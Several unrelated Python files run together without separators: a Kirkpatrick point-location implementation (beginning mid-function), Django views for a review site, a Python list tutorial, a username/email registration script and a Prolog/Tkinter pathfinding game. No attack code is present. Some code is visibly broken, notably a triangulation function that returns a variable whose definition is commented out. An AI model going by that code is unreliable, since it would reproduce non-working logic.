List[Triangle]: """ Triangulate regions, connecting into a tree (acyclic digraph) for lookups from triangles to the original polygon tiling. :param regions: list of regions to be triangulated :param graph: graph to be populated with edge from the original polygons to the triangles in their triangulations. :return: list of all triangles in all regions """ logging.debug("Triangulating subdivision of %d regions" % len(regions)) triangles = [] for i, region in enumerate(regions): logging.debug("Triangulating region %d" % i) logging.getLogger().handlers[0].flush() graph.add_node(region, original=True) if isinstance(region, Triangle): triangles.append(region) elif region.n == 3: region.__class__ = Triangle triangles.append(region) else: # triangulation = region.triangulate() triangulation = triangulate(region) for triangle in triangulation: graph.add_node(triangle, original=False) graph.add_edge(triangle, region) triangles.append(triangle) return triangles def remove_point_triangulation(affected_triangles: List[Triangle], p: Point) -> Polygon: """ Removes a point from affected triangles, return the resulting polygon that fills the gap. :param affected_triangles: list of the triangles containing the point to be removed :param p: point to be removed :return: polygon created by merging the affected triangles """ # First we construct a dictionary that tells us adjacency of triangles boundaries = [set(tri.pts) for tri in affected_triangles] point2triangles = defaultdict(set) for i, bound in enumerate(boundaries): bound.remove(p) u, v = bound point2triangles[u].add(i) point2triangles[v].add(i) # Connect adjacent triangles, noting which point connects them graph = Graph() for u, (i, j) in point2triangles.items(): graph.add_edge(i, j, point=u) # Walk around the triangles to get the new outer boundary # TODO: Remember to make this work. DFS visits all nodes not all edges. I think find_cycle works. # new_boundary = [ graph.get_edge_data(i, j)["point"] for (i, j) in nx.find_cycle(graph) # for (i, j) in nx.dfs_edges(graph) ] return Polygon(new_boundary) def next_layer(regions: List[Triangle], boundary: Triangle, digraph: DiGraph) -> List[Triangle]: """ Compute the next layer in the data structure by removing O(n) points, retriangulating, connecting new triangles in DAG to triangles with which they might overlap. We don't compute actual intersections to save time. :param regions: the current layer in the algorithm :param boundary: the bounding triangle (so that the boundary is never removed) :param digraph: digraph search tree for later location :return: list of triangles in the next layer """ # Since a tiling is represented as list of polygons, points may # appear multiple times in the tiling. We produce a mapping to # bring all information together point2regions = defaultdict(set) for i, region in enumerate(regions): for point in region.pts: point2regions[point].add(i) # Graph on the vertices of the tiling graph = Graph() for region in regions: for u, v in zip(region.pts, np.roll(region.pts, 1)): graph.add_edge(u, v) # Find independent set to remove constant fraction of triangles ind_set = planar_independent_set(graph, black_list=boundary.pts) # Find the affected regions to be joined together, triangulate, and connect into DAG unaffected = set(range(len(regions))) new_regions = list() for point in ind_set: # Remove point and join triangles. affected_ixs = point2regions[point] unaffected.difference_update(affected_ixs) affected = [regions[i] for i in affected_ixs] new_poly = remove_point_triangulation(affected, point) # Retriangulate # new_triangles = new_poly.triangulate() new_triangles = triangulate(new_poly) new_regions += new_triangles # Connect into DAG for lookups for tri in new_triangles: for ix in affected_ixs: digraph.add_node(tri, original=False) digraph.add_edge(tri, regions[ix]) new_regions += [regions[i] for i in unaffected] return new_regions class Kirkpatrick: """ Implementation of Kirkpatrick's algorithm. When passed a tiling of polygons, it processes it to produce a search tree. After preprocessing, location takes O(log n) time, and the object uses O(n) space. The plot_layers parameter will produce png files of the layers the algorithm produces during preprocessing. Note: this takes a while. """ def __init__(self, subdivision: List[Polygon], plot_layers=False): """ Create a point locator object on a planar subdivision """ self.digraph = DiGraph() self.top_layer = list() self._preprocess(subdivision, plot_layers=plot_layers) def _preprocess(self, subdivision: List[Polygon], plot_layers=False): """ If subdivision is not triangular, then triangulate each non-triangle region. Then place large triangle around region, and triangulate :param subdivision: """ logging.debug("Preprocessing planar subdivision") subdivision = triangle_graph(subdivision, self.digraph) logging.debug("Received triangulated subdivision") logging.debug("Constructing convex hull") all_pts = {p for tri in subdivision for p in tri.pts} hull = quickhull(list(all_pts)) hull = Polygon(hull) logging.debug("Wrapping polygon in bounding triangle") bounding_tri, gap_triangles = wrap_triangle(hull) for tri in gap_triangles: self.digraph.add_node(tri, original=False) layer = subdivision + gap_triangles if plot_layers: drawing.plot_polygons(layer, 'k-') plt.savefig("layer0.png") plt.clf() logging.debug("Iterating over layers") i = 0 while len(layer) > 1: logging.debug("Current layer size: %d" % len(layer)) layer = next_layer(layer, bounding_tri, self.digraph) i += 1 if plot_layers: drawing.plot_polygons(layer, 'k-') plt.savefig("layer%d.png" % i) plt.clf() logging.debug("Final layer size: %d" % len(layer)) self.top_layer = layer def locate(self, p: Point, plot_search=False) -> Optional[Polygon]: """ Locates a point in the original tiling in O(log n) time. :param p: point to be located :param plot_search: plots the tiles it searchs on the way :return: either the original polygon, or None if outside the tiling """ curr = None for region in self.top_layer: if p in region: curr = region break else: return None # Iterate until the layer of triangles immediately above the original tiling # This is because it is easy to test point containment in a triangle, not easy in general polygons. if plot_search: drawing.plot_point(p) drawing.plot_polygon(curr, 'r-') plt.savefig("search_layer0.png") plt.clf() i = 1 while len(self.digraph.neighbors(curr)) > 1: for node in self.digraph.neighbors(curr): if p in node: curr = node break else: return None if plot_search: drawing.plot_point(p) highlights = list() for node in self.digraph.neighbors(curr): drawing.plot_polygon(node, 'k-') if node.n == 3 and p in node: highlights.append(node) drawing.plot_polygons(highlights, 'r-') plt.savefig('search_layer%d.png' % i) plt.clf() i+=1 # Access the original tile just below the polygon if it exists neighbors = self.digraph.neighbors(curr) if len(neighbors) == 1: curr = neighbors[0] if self.digraph.node[curr]["original"]: return curr return None def time_tests(min_pts: int=10, max_pts: int=100, inc=5, n_iter=100) -> List[Point]: """ Executes an intensive test of the algorithm. Generates many tilings of different numbers of points, and generates many query points to test. :param min_pts: mininum number of points in tiling :param max_pts: maximum number of points in tiling :param inc: generate tilings every inc points from min to max :param n_iter: number of query points to test :return: List of points of (num_tiles, time for a query) """ logging.info("Running timing tests on point location") size = 100000 data = list() for i in range(min_pts, max_pts, inc): logging.info("Performing tests on %d points" % i) tiles = generate_triangle_tiling(num_pts=i, size=size) locator = Kirkpatrick(tiles) for j in range(n_iter): query = Point.sample_square(size) start = time.time() locator.locate(query) elapsed = time.time() - start data.append(Point(len(tiles), elapsed)) return data if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) tiles = [ Polygon([ Point(0, 0), Point(2, 0), Point(2, 2), Point(0, 2) ]) ] locator = Kirkpatrick(tiles) query_point = Point(1, 1) located_tile = locator.locate(query_point, plot_search=True) print(located_tile)
from django.shortcuts import render, get_object_or_404, get_list_or_404 from django.http import HttpResponse, Http404, HttpResponseRedirect from django.core.urlresolvers import reverse from models import MyUser, Tag, Entity, Review, Vote, Criteria_Teacher, Criteria_Uni from collections import defaultdict from django.core.exceptions import ObjectDoesNotExist import traceback def test_tag(request): tag_list = Tag.objects.all().values() return render(request, 'test_tag.html', {'tag_list' : tag_list}) def test_entity(request, entity_id): try: entity_id = int(entity_id) except ValueError: raise Http404() print "Fetching Info for Entity", entity_id entity_info = Entity.objects.get(id=entity_id) print entity_info return render(request, 'test_entity.html', {'entity_info' : entity_info}) def merge_dict(obj, new_dict): # merge django-orm class models with new dictionary for key, value in new_dict.items(): setattr(obj, key, value) return obj def calculate_overall(review_list, review_length): # Calculate the overall rating of an entity, supplied by review_list # Currently very ugly, will try to re-model later if review_length == 0: return [0.0, 0.0, 0.0, 0.0, 0.0] s = [0.0, 0.0, 0.0, 0.0, 0.0] for item in review_list: s[0] += item.rating_1 s[1] += item.rating_2 s[2] += item.rating_3 s[3] += item.rating_4 s[4] += item.rating_5 s = [(item/review_length) for item in s] return s def get_criteria_list(is_teacher): # return the list of criteria depending whether entity is teacher or uni if is_teacher: return get_list_or_404(Criteria_Teacher) else: return get_list_or_404(Criteria_Uni) def add_vote_info(review_list): # add vote_up, vote_total, vote_percentage to each review for each_review in review_list: new_dict = {} up = Vote.objects.filter(vote_review__id=each_review.id, vote_value=True).count() down = Vote.objects.filter(vote_review__id=each_review.id, vote_value=False).count() if (up+down) == 0: percent = 0 else: percent = int(100.0 * up / float(up+down)) new_dict["vote_up"] = up new_dict["vote_total"] = up + down new_dict["vote_percent"] = percent each_review = merge_dict(each_review, new_dict) return review_list def convert_rating_single(avg_score): # 3.5 -> (3,1) ; 3.0 -> (3,0); 3.9 -> (3,1) d = {} d["score_real"] = avg_score z = int(avg_score) d["score_full"] = z if (avg_score-z) > 0.0: d["score_half"] = 1 else: d["score_half"] = 0 return d def faster_convert(each_score, criteria_name): d = convert_rating_single(each_score) d["name"] = criteria_name return d def convert_rating_many(score_list, criteria_list): res = [faster_convert(each_score, criteria_list[idx]) for idx, each_score in enumerate(score_list)] return res def add_rating_info(review_list, criteria_list): for each_review in review_list: score_list = [each_review.rating_1, each_review.rating_2, each_review.rating_3, each_review.rating_4, each_review.rating_5] rating_list = convert_rating_many(score_list, criteria_list) each_review.rating = rating_list return review_list def add_tag_info(review_list, tag_list): tag_count = defaultdict(int) for each_review in review_list: review_tag_list = [each_review.tag_1, each_review.tag_2, each_review.tag_3, each_review.tag_4, each_review.tag_5] print review_tag_list review_tag_list = [item.id for item in review_tag_list if item] print review_tag_list review_tag_list = [tag_list[item-1] for item in review_tag_list] print review_tag_list each_review.tag_list = review_tag_list for item in review_tag_list: tag_count[item] += 1 tag_list_with_count = tag_count.items() print tag_list_with_count tag_list_with_count = sorted(tag_list_with_count, key=lambda item: -item[1]) print tag_list_with_count return (review_list, tag_list_with_count[:5]) def add_my_vote_info(review_list, my_vote_list): if not my_vote_list: return review_list for each_review in review_list: for vote_info in my_vote_list: if vote_info[0] == each_review.id: each_review.have_own_vote = True each_review.own_vote = vote_info[1] break return review_list def show_entity(request, entity_id): print "Fetch entity", entity_id entity_info = get_object_or_404(Entity, pk=entity_id) tag_list = get_list_or_404(Tag) print "Fetch tag" print tag_list #review_list = get_list_or_404(Review, entity__id=entity_id) review_list = Review.objects.filter(entity__id=entity_id) review_list = add_vote_info(review_list) print "Review List" print review_list entity_info.review_count = len(review_list) entity_score = calculate_overall(review_list, len(review_list)) entity_avg_score = sum(entity_score) / len(entity_score) entity_info = merge_dict(entity_info, convert_rating_single(entity_avg_score)) print 'Entity rating', entity_score print 'Entity Avg', entity_avg_score criteria_list = get_criteria_list(entity_info.is_teacher) print 'Criteria List', criteria_list entity_criteria = convert_rating_many(entity_score, criteria_list) review_list = add_rating_info(review_list, criteria_list) # TODO: sort review list (review_list, entity_best_tag) = add_tag_info(review_list, tag_list) print 'Best tag', entity_best_tag ##### registered user section # add own vote details, add own_review if exists have_own_review = False own_review_id = None if request.user.is_authenticated(): print "Logged in user", request.user.myuser.pk my_vote_list = Vote.objects.filter(vote_user__id=request.user.myuser.pk).values_list('vote_review_id', 'vote_value') print my_vote_list review_list = add_my_vote_info(review_list, my_vote_list) try: own_review = Review.objects.get(author_id=request.user.myuser.pk, entity_id=entity_id) print "Own Review exists" have_own_review = True own_review_id = own_review.id except ObjectDoesNotExist: print "No existing review" ########################## return render(request, 'entity_guest.html', { 'entity_info': entity_info, 'review_list' : review_list, 'entity_criteria' : entity_criteria, 'entity_best_tag' : entity_best_tag, 'have_own_review' : have_own_review, 'own_review_id' : own_review_id, }) def change_vote(request, review_id, vote_value): # vote_value = 0(false), 1(true), 2(cancel) # check user logged in, user own this vote valid_vote = [0, 1, 2] try: vote_value = int(vote_value) review_id = int(review_id) print request.path, request.user.id, request.user.myuser.id print "Receive ajax", review_id, vote_value if request.user.is_authenticated(): if vote_value == 2: print "Delete vote" target_vote = get_object_or_404(Vote, vote_user_id=request.user.myuser.id, vote_review_id=review_id) target_vote.delete() else: try: target_vote = Vote.objects.get(vote_user__id=request.user.myuser.id, vote_review__id=review_id) target_vote.vote_value = vote_value target_vote.save() print "Update vote" except ObjectDoesNotExist: print "Create vote" target_vote = Vote.objects.create(vote_user_id=request.user.myuser.id, vote_review_id=review_id, vote_value=vote_value) except Exception, e: return HttpResponse("Error AJAX", request.path) return HttpResponse("OK") def write_review(request, entity_id): if not request.user.is_authenticated(): return HttpResponseRedirect(reverse(('show_entity'), args=(entity_id,))) if request.method == 'GET': entity_info = get_object_or_404(Entity, pk=entity_id) criteria_list = get_criteria_list(entity_info.is_teacher) tag_list = get_list_or_404(Tag) # check if the user already have a review?, edit mode # very ugly code, i know try: my_review = Review.objects.get(author_id=request.user.myuser.pk, entity_id=entity_id) print "Review already existed, proceed to fetch" selected_tag_list = [] if my_review.tag_1: selected_tag_list.append(''.join(['tag', str(my_review.tag_1.id)])) if my_review.tag_2: selected_tag_list.append(''.join(['tag', str(my_review.tag_2.id)])) if my_review.tag_3: selected_tag_list.append(''.join(['tag', str(my_review.tag_3.id)])) if my_review.tag_4: selected_tag_list.append(''.join(['tag', str(my_review.tag_4.id)])) if my_review.tag_5: selected_tag_list.append(''.join(['tag', str(my_review.tag_5.id)])) return render(request, 'write_review.html', { 'entity_info' : entity_info, 'criteria_list' : criteria_list, 'tag_list' : tag_list, 'title' : my_review.title, 'content' : my_review.content, 'rating1': my_review.rating_1, 'rating2': my_review.rating_2, 'rating3': my_review.rating_3, 'rating4': my_review.rating_4, 'rating5': my_review.rating_5, 'selected_tag_list' : selected_tag_list, }) except ObjectDoesNotExist: return render(request, 'write_review.html', { 'entity_info' : entity_info, 'criteria_list' : criteria_list, 'tag_list' : tag_list, }) elif request.method == 'POST': # TODO: validate # populate data, currently ugly error = {} tag_id_list = Tag.objects.all().values_list('id', flat=True) selected_tag = [None, None, None, None, None] tag_count = 0 for tag_id in tag_id_list: if request.POST.get(''.join(['tag',str(tag_id)])): if tag_count == 5: error["tag"] = True break selected_tag[tag_count] = tag_id tag_count += 1 if tag_count < 3: error["tag"] = True if not request.POST.get('content'): error["content"] = True elif len(request.POST.get('content')) < 100: error["content"] = True if not request.POST.get('title'): error["title"] = True if not (request.POST.get('rating1') and request.POST.get('rating2') \ and request.POST.get('rating3') and request.POST.get('rating4') \ and request.POST.get('rating5')): error["rating"] = True if error: entity_info = get_object_or_404(Entity, pk=entity_id) criteria_list = get_criteria_list(entity_info.is_teacher) tag_list = get_list_or_404(Tag) form_selected_tag = [] for tag_id in tag_id_list: if request.POST.get(''.join(['tag',str(tag_id)])): form_selected_tag.append(''.join(['tag',str(tag_id)])) return render(request, 'write_review.html', { 'entity_info' : entity_info, 'criteria_list' : criteria_list, 'tag_list' : tag_list, 'error' : error, 'title' : request.POST.get('title'), 'content' : request.POST.get('content'), 'rating1': request.POST.get('rating1', 0), 'rating2': request.POST.get('rating2', 0), 'rating3': request.POST.get('rating3', 0), 'rating4': request.POST.get('rating4', 0), 'rating5': request.POST.get('rating5', 0), 'selected_tag_list' : form_selected_tag, }) try: print "No error validating review" print "Proceed to create or update review" Review.objects.update_or_create( author_id=request.user.myuser.pk, entity_id=entity_id, defaults={ 'content': request.POST.get('content'), 'title': request.POST.get('title'), 'rating_1':request.POST.get('rating1'), 'rating_2':request.POST.get('rating2'), 'rating_3':request.POST.get('rating3'), 'rating_4':request.POST.get('rating4'), 'rating_5':request.POST.get('rating5'), 'tag_1_id':selected_tag[0], 'tag_2_id':selected_tag[1], 'tag_3_id':selected_tag[2], 'tag_4_id':selected_tag[3], 'tag_5_id':selected_tag[4], } ) print "Review updated/created" except Exception, e: print traceback.print_exc() return HttpResponseRedirect(reverse(('show_entity'), args=(entity_id,))) def delete_review(request, entity_id): try: if request.user.is_authenticated(): try: review_to_delete = Review.objects.get(author_id=request.user.myuser.pk,entity_id=entity_id) print "Found review to delete" review_to_delete.delete() return HttpResponse("OK") except ObjectDoesNotExist: return None return None except Exception, e: print traceback.print_exc() def show_index(request): return render(request, 'index.html') # dev register from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User class UserForm(forms.ModelForm): password = forms.CharField(widget=forms.PasswordInput()) class Meta: model = User fields = ('username', 'email', 'password') class MyUserForm(forms.ModelForm): class Meta: model = MyUser fields = ('profile_pic', 'short_bio', 'name') def register(request): # A boolean value for telling the template whether the registration was successful. registered = False if request.method == 'POST': user_form = UserForm(data=request.POST) myuser_form = MyUserForm(data=request.POST) # If the two forms are valid... if user_form.is_valid() and myuser_form.is_valid(): user = user_form.save() user.set_password(user.password) user.save() myuser = myuser_form.save(commit=False) myuser.user = user if 'profile_pic' in request.FILES: print 'Profile pic is transported' myuser.profile_pic = request.FILES['profile_pic'] myuser.save() registered = True else: print user_form.errors, myuser_form.errors else: user_form = UserForm() myuser_form = MyUserForm() # Render the template depending on the context. return render(request, 'registration/register.html', {'user_form': user_form, 'myuser_form': myuser_form, 'registered': registered} )
# Lists in Python # Lists are one of the most powerful tools in python. # They are just like the arrays declared in other languages. # But the most powerful thing is that list need not be always homogeneous. # A single list can contain strings, integers, as well as objects. # Lists can also be used for implementing stacks and queues. # Lists are mutable, i.e., they can be altered once declared. # Declaring a list L = [1, "a" , "string" , 1+2] print L L.append(6) print L L.pop() print L print L[1] # Output :- [1, 'a', 'string', 3] [1, 'a', 'string', 3, 6] [1, 'a', 'string', 3] a # Lists are just like dynamic sized arrays, declared in other languages (vector in C++ and ArrayList in Java). # Lists need not be homogeneous always which makes it a most powerful tool in Python. # A single list may contain DataTypes like Integers, Strings, as well as Objects. # Lists are mutable, and hence, they can be altered even after their creation. # ----------------------------Creating List ------------------------------------ # Lists in Python can be created by just placing the sequence inside the square brackets[]. # Unlike Sets, list doesn’t need a built-in function for creation of list. # Creating a List List = [] print("Blank List: ") print(List) # Creating a List of numbers List = [10, 20, 14] print("\nList of numbers: ") print(List) # Creating a List of strings and accessing # using index List = ["Geeks", "For", "Geeks"] print("\nList Items: ") print(List[0]) print(List[2]) # Creating a Multi-Dimensional List # (By Nesting a list inside a List) List = [['Geeks', 'For'] , ['Geeks']] print("\nMulti-Dimensional List: ") print(List) # Creating a list with multiple distinct or duplicate elements # A list may contain duplicate values with their distinct positions and # hence, multiple distinct or duplicate values can be passed as a sequence at the time of list creation. # Creating a List with # the use of Numbers # (Having duplicate values) List = [1, 2, 4, 4, 3, 3, 3, 6, 5] print("\nList with the use of Numbers: ") print(List) # Creating a List with # mixed type of values # (Having numbers and strings) List = [1, 2, 'Geeks', 4, 'For', 6, 'Geeks'] print("\nList with the use of Mixed Values: ") print(List) # for size len(list1) # Adding elements to the list # Elements can be added to the List by using built-in append() function. # Only one element at a time can be added to the list by using append() method, # for addition of multiple elements with the append() method, loops are used. # Tuples can also be added to the List with the use of append method because tuples are immutable. # Unlike Sets, Lists can also be added to the existing list with the use of append() method. # Creating a List List = [] print("Initial blank List: ") print(List) # Addition of Elements # in the List List.append(1) List.append(2) List.append(4) # ---> Using insert() method # append() method only works for addition of elements at the end of the List, # for addition of element at the desired position, insert() method is used. # Unlike append() which takes only one argument, insert() method requires two arguments(position, value). # Creating a List List = [1,2,3,4] print("Initial List: ") print(List) # Addition of Element at # specific Position # (using Insert Method) List.insert(3, 12) List.insert(0, 'Geeks') print("\nList after performing Insert Operation: ") print(List) # ---> Using extend() method #Other than append() and insert() methods, there’s one more method for Addition of elements, extend(), # this method is used to add multiple elements at the same time at the end of the list. # Creating a List List = [1,2,3,4] print("Initial List: ") print(List) # Addition of multiple elements # to the List at the end # (using Extend Method) List.extend([8, 'Geeks', 'Always']) print("\nList after performing Extend Operation: ") print(List) # ----------------------------Removing elements from the List ------------------------------------ # Using remove() method # Elements can be removed from the List by using built-in remove() function but # an Error arises if element doesn’t exist in the set. # Remove() method only removes one element at a time, to remove range of elements, iterator is used. # The remove() method removes the specified item. # Note – Remove method in List will only remove the first occurrence of the searched element. # Creating a List List = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] print("Intial List: ") print(List) # Removing elements from List # using Remove() method List.remove(5) List.remove(6) print("\nList after Removal of two elements: ") print(List) # Removing elements from List # using iterator method for i in range(1, 5): List.remove(i) print("\nList after Removing a range of elements: ") print(List) # Using pop() method :- removes last element # Removing element at a # specific location from the # Set using the pop() method List.pop(2) # ----------------------------Slicing List ------------------------------------ # In Python List, there are multiple ways to print the whole List with all the elements, # but to print a specific range of elements from the list, we use Slice operation. # Slice operation is performed on Lists with the use of a colon(:). # To print elements from beginning to a range use [: Index], to print elements from end-use [:-Index], # to print elements from specific Index till the end use [Index:], # to print elements within a range, use [Start Index:End Index] and to print the whole List with the use of slicing operation, # use [:]. Further, to print the whole List in reverse order, use [::-1]. # Creating a List List = ['G','E','E','K','S','F', 'O','R','G','E','E','K','S'] print("Intial List: ") print(List) # Print elements of a range # using Slice operation Sliced_List = List[3:8] print("\nSlicing elements in a range 3-8: ") print(Sliced_List) # Print elements from a # pre-defined point to end Sliced_List = List[5:] print("\nElements sliced from 5th " "element till the end: ") print(Sliced_List) # Printing elements from # beginning till end Sliced_List = List[:] print("\nPrinting all elements using slice operation: ") print(Sliced_List)
#user_maker.py __author__='''Shivek Khurana''' __version__='''01.12.04.2010 | read as version.day.month.year''' __doc__='''Description : Create a dictionary named users, and add functionality to add, remove a user.''' uname={'shivek':'shivekk@gmail.com','mehak':'mehak@ls.com'} def username_input(): '''New user ? add yourself to the list''' global u while True: u=input('username : ') if len(u)<=1: print('''invalid username :{''') elif uname.__contains__(u): print('''username already in use :(''') else: break def email_validator(email): import re if len(email) >=6: if re.match("^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$", email) != None: for a,b in uname.items(): if email==b: print('''email already in use :{''') return email_input() print('''done''') else: print('''email not valid :(''') return email_input() else: print('''invalid email :{''') return email_input() def email_input(): e=input('''email id : ''') email_validator(e) def lister(): for a,b in uname.items(): print('''{0} : {1}'''.format(a,b)) def form(): username_input() email_input() form() uname[u]=e
#!/usr/bin/env python # -*- coding: utf-8 -*- """ LICENSE FOR USING PYSWIP Copyright (c) 2007-2018 Yüce Tekol Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ #Inserção da biblioteca Prolog from pyswip import Prolog #Bibliotecas para a interface gráfica Tkinter from tkinter import * from PIL import ImageTk, Image #Biblioteca time para efeitos na interface import time #Utilização para a interface gráfica def temEscada(esctimeada, coluna, linha): for i in range (0, len(escada)): if(escada[i][1] == linha and escada[i][2] == coluna): return True elif(escada[i][0] == linha and escada[i][2] == coluna): return True return False #Tentativa de definir a posição do policial e do ladrao dinamicamente master = Tk() master.title("Seleção das posições") Label(master, text="Policial (X,Y)").grid(row=0) Label(master, text="Ladrao (X,Y)").grid(row=1) e1 = Entry(master) e2 = Entry(master) e3 = Entry(master) e4 = Entry(master) e1.grid(row=0, column=1) e2.grid(row=0, column=2) e3.grid(row=1, column=1) e4.grid(row=1, column=2) Button(master, text='Iniciar', command=master.quit).grid(row=5, column=1, sticky=W, pady=3) mainloop( ) #Auxiliares para posicionamento do ladrao e do policial policiaX = int(e1.get()) policiaY = int(e2.get()) ladraoX = int(e3.get()) ladraoY = int(e4.get()) master.destroy() #Instanciação do prolog para utilizar a máquina de inferencia python prolog = Prolog() #posicionamento dos carrinhonhos (x,y) carrinho = [[4,3],[6,1],[4,5],[3,5],[8,2]] for i in range(0,len(carrinho)): prolog.assertz("carrinho(" + str(carrinho[i][0]) + "," + str(carrinho[i][1]) + ")") #escada possui andar abaixo, andar acima, e posicao x ,[2,5,3] escada = [[1,2,4],[2,3,1],[3,4,9],[4,5,6],[1,2,10]] for i in range(0,len(escada)): prolog.assertz("escada(" + str(escada[i][0]) + "," + str(escada[i][1]) + "," + str(escada[i][2]) + ")") #funcoes auxiliares (PROLOG) prolog.assertz("ladrao(_,Yp,_,Yl) :- Yp =\= Yl") prolog.assertz("ladrao(Xp,Yp,Xl,Yl) :- Yp == Yl, Xp =\= Xl") #2 - Verificador se a direita está livre (PROLOG) prolog.assertz("livreDireita(Xp,Yp,Xl,Yl) :- Xp1 is Xp+1, Xp2 is Xp+2, carrinho(Xp1,Yp), not(carrinho(Xp2,Yp)), not(escada(Yp,_,Xp2)), not(escada(_,Yp,Xp2)), ladrao(Xp2,Yp,Xl,Yl)") #3 - Verificador se a direita imediata está livre (PROLOG) prolog.assertz("livreIDireita(Xp,Yp) :- Xp1 is Xp+1, not(carrinho(Xp1,Yp))") #4 - Verificador se a esquerda esta livre (PROLOG) prolog.assertz("livreEsquerda(Xp,Yp,Xl,Yl) :- Xp1 is Xp-1, Xp2 is Xp-2, carrinho(Xp1,Yp), not(carrinho(Xp2,Yp)), not(escada(Yp,_,Xp2)), not(escada(_,Yp,Xp2)), ladrao(Xp2,Yp,Xl,Yl)") #5 - Verificador se a esquerda imediata está livre (PROLOG) prolog.assertz("livreIEsquerda(Xp,Yp) :- Xp1 is Xp-1, not(carrinho(Xp1,Yp))") #6 - Função pertence que verifica a existência de um dado elemento (PROLOG) prolog.assertz("pertence(Elem, [Elem|_])") prolog.assertz("pertence(Elem, [_|Cauda]):- pertence(Elem, Cauda)") #Acoes #7 - Ação de andar para a direita (PROLOG) prolog.assertz("acao(aDireita, L, [[d,Xp2,Yp]|L], estado(Xp1,Yp,Xl,Yl), estado(Xp2,Yp,Xl,Yl)) :- Xp1 < 10, livreIDireita(Xp1,Yp), Xp2 is Xp1+1, not(pertence([d,Xp2,Yp],L))") #8 - Ação de pular um carrinho quando esta a direita do policial (PROLOG) prolog.assertz("acao(pularCarrinhoD, L, [[pcd,Xps,Yp]|L], estado(Xpe,Yp,Xl,Yl), estado(Xps,Yp,Xl,Yl)) :- Xpe > 2, Xp1 is Xpe+1, Xps is Xpe+2, carrinho(Xp1,Yp), livreDireita(Xpe,Yp,Xl,Yl), not(pertence([pcd,Xps,Yp],L))") #11 - Ação de subir na escada (PROLOG) prolog.assertz("acao(subir, L, [[s,Xp,Yp2]|L], estado(Xp,Yp1,Xl,Yl), estado(Xp,Yp2,Xl,Yl)) :- Yp1 < 5, escada(Yp1,Yp2,Xp), not(pertence([s,Xp,Yp1],L))") #9 - Ação de andar para a esquerda (PROLOG) prolog.assertz("acao(aEsquerda, L, [[e,Xp2,Yp]|L], estado(Xp1,Yp,Xl,Yl), estado(Xp2,Yp,Xl,Yl)) :- Xp1 > 1, livreIEsquerda(Xp1,Yp), Xp2 is Xp1-1, not(pertence([e,Xp2,Yp],L))") #10 - Ação de pular um carrinho quando esta a esquerda do policial (PROLOG) prolog.assertz("acao(pularCarrinhoE, L, [[pce,Xps,Yp]|L], estado(Xpe,Yp,Xl,Yl), estado(Xps,Yp,Xl,Yl)) :- Xpe < 8, Xp1 is Xpe-1, Xps is Xpe-2, carrinho(Xp1,Yp), livreEsquerda(Xpe,Yp,Xl,Yl), not(pertence([pce,Xps,Yp],L))") #12 - Ação de descer da escada (PROLOG) prolog.assertz("acao(descer, L, [[d,Xp,Yp2]|L], estado(Xp,Yp1,Xl,Yl), estado(Xp,Yp2,Xl,Yl)) :- Yp1 >= 0, escada(Yp2,Yp1,Xp), not(pertence([d,Xp,Yp2],L))") #1 - Consegue situação final (PROLOG) prolog.assertz("consegue(T, estado(X,Y,X,Y), T)") #13 - Consegue intermediário (PROLOG) prolog.assertz("consegue(L, Estado2, L2) :- acao(_, L, L1, Estado2, Estado1), consegue(L1, Estado1, L2)") #14 - Chamar consegue com estado inicial do policial(Xp,Yp) e do ladrao(Xl,Yl) (PROLOG) prolog.assertz("solucao(estado(X,Y,Z,W), L) :- acao(_, [[i,X,Y]], L1, estado(X,Y,Z,W), Estado1), consegue(L1, Estado1, L), !") x = list(prolog.query("solucao(estado(" + str(policiaX) + "," + str(policiaY) + "," + str(ladraoX) + "," + str(ladraoY) + "), X)")) if(x != []): resposta = str(x[0]) tam = len(resposta) respostaTratada = resposta[6:tam-1] respostaTratada = respostaTratada.split('A') respostaTratada.pop(0) listaTemp = [] for i in range (0,len(respostaTratada)-1): temp = respostaTratada[i].split(',') temp.pop(0) temp.pop(len(temp)-1) temp[1] = temp[1][0:2] listaTemp.append(temp) listaTemp.reverse() #Instanciação do objeto TK para interface gráfica root = Tk() root.title("Demonstrativo do caminho") Button(root, text='Quit', command=root.quit).grid(row=6, column=5, sticky=W, pady=3) #Configurando as camadas de exibição imgbranco = ImageTk.PhotoImage(Image.open("Image/branco.png")) imgpoli = ImageTk.PhotoImage(Image.open("Image/policial.png")) imgladrao = ImageTk.PhotoImage(Image.open("Image/ladrao.png")) imgcar = ImageTk.PhotoImage(Image.open("Image/carrinho.png")) imgesc = ImageTk.PhotoImage(Image.open("Image/escada.png")) imgPoliEsc = ImageTk.PhotoImage(Image.open("Image/policiaEscada.png")) #Criando a primeira camada (mapa) imglabel = [] for i in range (0,5): linha = [] for j in range (0,10): if([j+1,5-i] in carrinho): linha.append(Label(root, image=imgcar).grid(row=i, column=j)) else: linha.append(Label(root, image=imgbranco).grid(row=i, column=j)) imglabel.append(linha) #Impressão das escadas for i in range(0, len(escada)): imglabel[5-escada[i][2]][escada[i][1]-1] = Label(root, image=imgesc).grid(row=5-escada[i][1], column=escada[i][2]-1) imglabel[5-escada[i][2]][escada[i][0]-1] = Label(root, image=imgesc).grid(row=5-escada[i][0], column=escada[i][2]-1) #Criando a camada do policial imglabel2 = Label(root, image=imgpoli).grid(row=5-policiaY, column=policiaX-1) imglabel2 = Label(root, image=imgladrao).grid(row=5-ladraoY, column=ladraoX-1) 